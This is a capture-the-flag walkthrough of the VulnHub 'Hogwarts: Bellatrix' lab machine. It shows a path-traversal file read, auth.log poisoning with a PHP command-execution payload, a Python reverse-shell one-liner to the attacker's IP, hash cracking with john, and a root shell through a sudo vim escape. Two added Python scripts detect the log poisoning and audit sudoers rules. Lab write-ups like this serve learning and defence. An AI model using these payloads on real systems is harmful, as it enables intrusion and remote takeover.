VulnHub: Hogwarts: Bellatrix

Today we will take a look at VulnHub: Bellatrix. My goal in sharing this writeup is to help you if you get stuck. Please try to understand each step and take notes.

  • Network scan

Command: sudo nmap -p- -sV -sC -oN nmap/open --open 192.168.0.105

Nmap scan report for 192.168.0.113
Host is up (0.032s latency).
Not shown: 61087 closed tcp ports (reset), 4446 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4b:ce:c7:5a:9c:1f:8b:cd:47:03:08:69:85:c2:91:49 (RSA)
| 256 a1:2a:a8:15:99:04:cc:2a:1e:e3:50:00:f3:55:c2:cc (ECDSA)
|_ 256 2c:d3:ec:6f:4f:5b:4a:e0:ea:0a:c3:0d:2f:cb:78:17 (ED25519)
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-title: AvadaKedavra
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 3C:A0:67:C5:35:33 (Liteon Technology)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Web

Noticing the .php extension, we go to that page.

http://192.168.0.113/ikilledsiriusblack.php

There is something interesting in the page source (shown in the screenshot that accompanied the original post).

Yes, that’s what you think. Let’s check. ;)

http://192.168.0.113/ikilledsiriusblack.php?file=../../../../../../etc/passwd

From here we need a reverse shell. Investigating further, we find that the SSH authentication log can be read through the same parameter. Let's check:

http://192.168.0.113/ikilledsiriusblack.php?file=../../../../../../var/log/auth.log

Command: ssh '<?php system($_GET["cmd"]); ?>'@192.168.0.113

sshd writes the attempted username verbatim into auth.log, so the PHP tag ends up inside the file that the vulnerable include reads.

http://192.168.0.113/ikilledsiriusblack.php?file=../../../../../..//var/log/auth.log&cmd=ls%20-la

Yes, it works.
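From the defender's side, both artefacts above are easy to spot in logs. The following Python script is an added example (it is not part of the original writeup and not the box's own code): it scans constructed Apache access-log lines for traversal sequences, sensitive-file reads and the "read a log file plus an extra parameter" shape of a log-poisoning trigger, and scans constructed sshd lines for PHP tags, which have no business appearing in auth.log. The log lines, the hostname `bellatrix`, the client IPs and the function names are all assumptions made for the example.

```python
import re
import urllib.parse

# Constructed Apache access-log lines (combined log format); not taken from the box.
ACCESS_LOG = """\
192.168.0.107 - - [22/May/2022:20:40:01 +0300] "GET /ikilledsiriusblack.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.0.107 - - [22/May/2022:20:41:10 +0300] "GET /ikilledsiriusblack.php?file=../../../../../../etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.0.107 - - [22/May/2022:20:42:33 +0300] "GET /ikilledsiriusblack.php?file=..%2F..%2F..%2F..%2Fvar%2Flog%2Fauth.log&cmd=ls%20-la HTTP/1.1" 200 9000 "-" "curl/7.81"
192.168.0.107 - - [22/May/2022:20:43:00 +0300] "GET /ikilledsiriusblack.php?file=about.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Constructed sshd lines showing what a poisoned auth.log looks like after the ssh trick above.
AUTH_LOG = """\
May 22 20:45:01 bellatrix sshd[1234]: Invalid user <?php system($_GET["cmd"]); ?> from 192.168.0.107 port 51234
May 22 20:45:02 bellatrix sshd[1234]: Connection closed by invalid user <?php system($_GET["cmd"]); ?> 192.168.0.107 port 51234 [preauth]
May 22 20:46:10 bellatrix sshd[1250]: Accepted publickey for alice from 192.168.0.50 port 40000 ssh2
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/var/log/", "/proc/self/")
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=)', re.IGNORECASE)


def decode_twice(value):
    """Percent-decode twice so a double-encoded '..%252F' is still recognised."""
    return urllib.parse.unquote(urllib.parse.unquote(value))


def classify_request(line):
    """Findings for one access-log line: [] if nothing is suspicious, None if the line does not parse."""
    m = REQUEST_RE.match(line)
    if m is None:
        return None
    query = urllib.parse.urlsplit(m.group("target")).query
    params = urllib.parse.parse_qs(query, keep_blank_values=True)
    values = [decode_twice(v) for vs in params.values() for v in vs]
    findings = []
    if any(TRAVERSAL_RE.search(v) for v in values):
        findings.append("path_traversal")
    if any(p in v for v in values for p in SENSITIVE_PATHS):
        findings.append("sensitive_file")
    # Reading a log file *and* supplying a second parameter is the shape of a log-poisoning trigger.
    if any("/var/log/" in v for v in values) and len(params) > 1:
        findings.append("log_read_with_extra_param")
    return findings


def scan_access_log(text):
    """Return [(line_number, findings)] for every line with at least one finding (1-based numbering)."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        findings = classify_request(line)
        if findings:
            hits.append((lineno, findings))
    return hits


def find_poisoned_lines(text):
    """Return 1-based line numbers of auth.log entries that contain a PHP open tag."""
    return [n for n, line in enumerate(text.splitlines(), 1) if PHP_TAG_RE.search(line)]


if __name__ == "__main__":
    for lineno, findings in scan_access_log(ACCESS_LOG):
        print(f"access.log line {lineno}: {', '.join(findings)}")
    for lineno in find_poisoned_lines(AUTH_LOG):
        print(f"auth.log line {lineno}: PHP tag in sshd entry")
```

In production you would feed real files to `scan_access_log` and `find_poisoned_lines`; the point of the two-stage check is that the traversal alone (`../`) is noisy, but a traversal that lands on `/var/log/` together with a second parameter is a much stronger signal, and a PHP tag inside auth.log is essentially never benign.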

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.107",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

After the reverse shell connects, upgrade it to a fully interactive TTY:

Command: script /dev/null -c bash

Command: export TERM=xterm

ctrl+z

Command: stty raw -echo ; fg

Command: reset

  • Lestrange

Looking around the filesystem, we find a folder whose name is base64-encoded. It contains two files: one is a password list, the other holds the username and its password hash.

Command: john hash --wordlist=pass.txt

Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ihateharrypotter (lestrange)
1g 0:00:00:00 DONE (2022-05-22 20:52) 2.380g/s 273.8p/s 273.8c/s 273.8C/s gryffondor
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Command: su lestrange

  • Root

Command: sudo -l

(ALL : ALL) NOPASSWD: /usr/bin/vim

Command: sudo /usr/bin/vim -c ':!/bin/sh'

And now we are root.
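The root step works because sudo grants `vim` without a password and `vim` can spawn a shell, so the sudoers rule, not a bug, is the vulnerability. The following Python script is an added example (not part of the original writeup) of the kind of sudoers audit that would catch this rule: it parses a constructed sudoers file, records the `NOPASSWD` and `NOEXEC` tags, and flags rules that hand out an interactive editor or pager without `NOEXEC`, or `NOPASSWD` for `ALL`. The sudoers content, the user names other than `lestrange`, and the function names are assumptions.

```python
import os
import re

# Constructed sudoers content for the example; not the box's real /etc/sudoers.
SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
lestrange ALL=(ALL : ALL) NOPASSWD: /usr/bin/vim
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app.service
%admin  ALL=(ALL) ALL
hagrid  ALL=(ALL) NOEXEC: /usr/bin/vim
"""

# Binaries that offer an interactive shell escape; vim is the one used in the writeup.
SHELL_ESCAPE_BINARIES = {"vim", "vi", "less", "more"}

# who  host = (runas) TAG: TAG: cmd, cmd
RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*'
    r'(?:\((?P<runas>[^)]*)\)\s*)?'
    r'(?P<tags>(?:[A-Z]+:\s*)*)'
    r'(?P<cmds>.+)$'
)


def parse_sudoers(text):
    """Parse user-specification lines into dicts; comments, blanks and Defaults lines are skipped."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if m is None:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        rules.append({
            "line": lineno,
            "who": m.group("who"),
            "runas": (m.group("runas") or "").replace(" ", ""),
            "nopasswd": "NOPASSWD" in tags,
            "noexec": "NOEXEC" in tags,
            "cmds": [c.strip() for c in m.group("cmds").split(",")],
        })
    return rules


def audit(rules):
    """Return (line, who, reason) for every rule that grants an easy path to a root shell."""
    findings = []
    for r in rules:
        for cmd in r["cmds"]:
            if cmd == "ALL":
                if r["nopasswd"]:
                    findings.append((r["line"], r["who"], "NOPASSWD for ALL commands"))
                continue
            binary = os.path.basename(cmd.split()[0])
            # NOEXEC blocks the editor from executing child processes, which defeats ':!/bin/sh'.
            if binary in SHELL_ESCAPE_BINARIES and not r["noexec"]:
                findings.append((r["line"], r["who"], f"shell escape via {binary}"))
    return findings


if __name__ == "__main__":
    for line, who, reason in audit(parse_sudoers(SUDOERS)):
        print(f"sudoers line {line}: {who}: {reason}")
```

The fix for the rule on the box is to drop it, or at least to give the user `sudoedit` (which runs the editor unprivileged and only copies the file back as root) or the `NOEXEC:` tag as in the `hagrid` line above. `NOEXEC` relies on `LD_PRELOAD`, so it does not constrain statically linked binaries; treat it as a mitigation, not a substitute for removing the rule.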

"If you have any questions or comments, please do not hesitate to write. Have a good day."
